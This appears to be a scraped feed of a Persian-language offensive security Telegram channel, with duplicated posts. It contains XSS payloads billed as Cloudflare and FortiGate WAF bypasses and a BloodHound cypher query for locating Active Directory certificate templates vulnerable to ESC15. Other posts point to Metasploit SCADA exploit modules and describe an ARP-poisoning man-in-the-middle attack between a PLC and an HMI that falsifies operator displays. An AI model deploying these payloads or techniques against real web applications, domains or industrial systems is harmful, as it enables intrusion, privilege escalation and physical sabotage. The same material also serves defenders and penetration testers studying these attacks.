P.F.K Security
SCADA Hacking: Metasploit SCADA Modules به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که میتوانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است. در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit…
ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم.
لطفاً توجه داشته باشید که ماژولها از ماژولهای بهرهبرداری و ماژولهای کمکی (عمدتاً برای recon استفاده میشوند) متفاوت هستند.
@pfksecurity
لطفاً توجه داشته باشید که ماژولها از ماژولهای بهرهبرداری و ماژولهای کمکی (عمدتاً برای recon استفاده میشوند) متفاوت هستند.
@pfksecurity
CLOUDFLARE BYPASS xss
PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
FortiGate WAF bypass
<details open ontoggle="(()=>alertibrahimxss)()"></details>
#exploit #bypass
@pfkSecurity
PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
FortiGate WAF bypass
<details open ontoggle="(()=>alertibrahimxss)()"></details>
#exploit #bypass
@pfkSecurity
BloodHound ADCS ESC15 (EKUwu) cypher query.
از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالبهای گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده میکند.
@PfkSecurity
از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالبهای گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده میکند.
MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
این ویدئو یک سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این وکتور حمله نشان می دهد که چگونه می توان کنترل کامل یک موتور (دستگاه نقطه پایانی) را به دست آورد. پس از مسموم کردن یا همون poisoning جدول arp HMI و درج مقادیر جعلی، مقادیر مطلوب را مستقیماً به PLC ارسال کردند تا نمایشی نادرست (مشابه نتایج حمله استاکس نت) ایجاد کنند.
@PfkSecurity
@PfkSecurity